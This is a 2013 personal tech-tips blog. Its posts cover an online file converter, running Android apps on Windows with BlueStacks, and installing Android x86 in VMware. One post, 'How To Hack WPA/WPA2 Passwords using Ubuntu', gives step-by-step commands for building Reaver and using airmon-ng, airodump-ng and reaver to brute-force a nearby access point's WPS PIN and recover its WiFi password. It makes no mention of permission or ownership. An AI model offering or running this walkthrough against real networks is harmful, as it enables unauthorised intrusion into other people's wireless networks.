Wednesday, November 20, 2013


element.style { } user agent stylesheethtml { display: block; }

Friday, October 25, 2013

Online-converter.....

Online-Converter provides a huge file conversion services, almost from any file to any file. Online-Converter is a good place to convert your documents files fast and free, it's an alternative to Zoho and Zamzar to make docs readable by converting them.
Supported Formats: DOC, DOCX, PPT, PPTX, SWF, HTML, ODT, PDF, RTF...
How to use:


  1. Go to Document.Online-Converter.com
  2. Select the type of conversion you are going to perform
  3. Click Choose File or Upload the doc via an URL
  4. Click Convert 

How to Run Android APK Apps on your Computer(windows).....

1) Download and Install BlueStacks
2) Launch BlueStacks App Player after finishing setup.
3) Register for an account, by typing your e-mail and phone number.
4) Now you can synchronize apps from your mobile phone or search for Apps to download.
5) Search for an App to download : e.g Angry Birds
6) Download it and start playing it with your Windows Computer.
7) Done! You can also send apps to your smartphone...

How To Hack WPA/WPA2 Passwords using Ubuntu.....

Step 1 (Setting up Reaver 1.4 )

0) Open terminal and type: sudo -s    and type your password.
1) Download (Better Download the Latest Version ) Placed in a specified folder.
2) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
3) Install dependencies: sudo apt-get install libpcap-dev

    then : sudo apt-get install libsqlite3-dev

Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.

4) Enter the folder by typing : cd reaver-1.4/src
5) Type: ./configure
6) Type : make
7) Type : make install


To test if Reaver have been successfully installed, Open a Terminal and Type 'reaver' and hit enter, it should list all Reaver's sub commands.

Step 2 ( Hacking WPA/WPA2 Wireless)

After installing reaver 1.4, it's time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.

Requirements:
Airodump-ng / Airmon-ng commands (You have to install aircrack: you can find how to HERE)
Reaver 1.4 (Install in Step 1)

1) We need to have the wireless BSSID (Mac address) so we use airodump-ng :
 Open a terminal and Type : Airmon-ng start wlan0
 Type : airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:22:33:44:55 )

2) Starting the attack:

Type:  reaver -i mon0 -b 00:11:22:33:44:55

       Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.

Note: You can use walsh -i mon0 to scan for vulnerable Access Points

Screenshot:

How to Install Android os On PC / Laptop.....

1) Download Android x86 ISO File (Download android-x86-4.0-RC1-eeepc.iso )

2) Download and Install VMware Player.

3) Add a New Virtual Machine and Add the downloaded ISO File (Tutorial to Install and Setup VMware>>)
4) After Setting up your virtual machine, Boot and Install Android x86 (easy setup)
5) Done! Now it will works fine, enjoy Android for Windows.